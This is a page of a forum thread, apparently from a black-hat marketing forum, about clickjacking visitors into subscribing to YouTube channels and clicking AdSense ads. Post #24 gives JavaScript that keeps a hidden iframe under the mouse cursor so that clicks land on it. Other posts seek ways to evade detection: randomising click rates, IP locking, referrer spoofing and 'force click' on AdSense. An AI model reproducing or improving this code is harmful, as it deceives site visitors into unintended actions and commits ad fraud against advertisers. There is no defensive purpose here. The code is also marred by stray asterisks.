+ Reply to Thread + Post New Thread
Page 3 of 6 FirstFirst 123456 LastLast
Results 21 to 30 of 55

Thread: ClickJacking / Auto Subscribe YouTube

  1. #21
    Noobie
    Join Date
    Apr 2008
    Posts
    65
    Thanks
    0
    Thanked 1 Time in 1 Post

    Default

    How will you get the people to click on the ads/subscribe button?

  2. Shorten URL    SEO Services    Buy Xrumer

    Sponsored Links

  3. #22
    Noobie
    Join Date
    Apr 2008
    Posts
    33
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Please read the title of the thread again.

  4. #23
    Noobie
    Join Date
    Apr 2008
    Posts
    65
    Thanks
    0
    Thanked 1 Time in 1 Post

    Default

    Lol, you took it out of context.

  5. #24
    Noobie
    Join Date
    Apr 2008
    Posts
    47
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    alright I was able to get this to work by changing the coordinates some however it does not work in firefox here's the new code for internet explorer

    Code:
    ********
    ****
    ****
    ********var iflag = 0;
    ** *var icontainer = document.getElementById('icontainer');
    ** *var iframe = document.getElementById('i_frame');
    ** *function mouseFollower(e){
    ** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */
    ** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
    ** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
    ** * * */* ------------------------------------------------------------*/
    ** * * */* places the iframe at the tip of the cursor, to make it clickable */
    ** * * *icontainer.style.left = (x - 1) + 'px';
    ** * * *icontainer.style.top = (y - 1) + 'px';
    ** *}
    ** *document.onmousemove = function(e) {
    ** *****if (iflag == 0) {
    ** *********mouseFollower(e);
    ** *****}
    ** *}
    ****
    anyone have any idea how to make it work in firefox. I think it has something to do with the top and left commands. I believe firefox uses different commands than these to find cursor position.

  6. #25
    Noobie
    Join Date
    Apr 2008
    Posts
    257
    Thanks
    0
    Thanked 3 Times in 1 Post

    Default

    @howtomeetagirl: This script works on Firefox or at least my firefox

  7. #26
    Noobie
    Join Date
    Apr 2008
    Posts
    10
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    the problem of not working in firefox cud be related to the size of the div and iframe and their positioning with respect to mouse cursor.

  8. #27
    Noobie
    Join Date
    Apr 2008
    Posts
    10
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    one way of controlling the ctr wud be to use math random function to call the clickjacking code. I am also thinking of implementing IP lock and traffic diversion for unused clicks.

  9. #28
    Noobie
    Join Date
    Apr 2008
    Posts
    66
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Anyone has successfully installed this without any error?
    Does it create some harm?
    Any feedback?
    Sorry for the nube question but Im completely nube at YT stuff.

  10. #29
    Noobie
    Join Date
    Apr 2008
    Posts
    47
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    What version firefox do you have? I see lots of potential for this script, but my php is shitty and I want to know how to spoof referrer and add a random function for ctr.

  11. #30
    Noobie
    Join Date
    Apr 2008
    Posts
    117
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    This may not seem so Jr. Vip of me and I know I'm bumping sort of an older thread; but does these scripts for adsense still work? I don't mind trying it myself, but the answer to my question below is somewhat of a determining factor over whether one should risk using this script.

    Is it a bad idea to use adsense force click if your traffic primarily comes from adwords?

+ Reply to Thread
Page 3 of 6 FirstFirst 123456 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts